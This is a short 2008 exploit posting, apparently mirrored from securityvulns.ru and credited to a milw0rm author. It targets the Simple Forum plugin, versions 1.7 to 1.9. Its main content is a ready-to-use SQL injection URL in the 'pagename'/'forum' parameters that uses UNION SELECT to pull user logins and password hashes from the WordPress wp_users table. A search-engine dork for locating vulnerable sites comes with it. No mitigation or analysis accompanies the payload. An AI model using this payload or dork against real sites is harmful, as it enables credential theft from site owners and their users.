Security Advisory: Simple Forum Version 1.7-1.9(pagename)

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  banpro-dms 1.0 local file inclusion vulnerability
  joomla SQL Injection(com_sg)

  joomla SQL Injection(com_emc
ompose)
  joomla SQL Injection(com_fil
ebase)

From: hackturkiye.hackturkiye_(at)_gmail.com <hackturkiye.hackturkiye_(at)_gmail.com>
Date: 16.02.2008
Subject: Simple Forum Version 1.7-1.9(pagename)

###############################################################
#
#   Simple Forum Version 1.7-1.9(pagename)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: "index.php?pagename"forum
#
# DORK 2 :

  Simple Forum - Version 1.7
  Simple Forum - Version 1.9
#
################################################################
  EXPLOIT :

index.php?pagename=sf-forum&forum=-99999/**/UNION/**/SELECT/**/0,
concat(0x7c,user_login,0x7c,user_pass,0x7c),111,222,333,444,
555/**/FROM/**/wp_users/*

################################################################
# S@BUN           i AM NOT HACKER      S@BUN
################################################################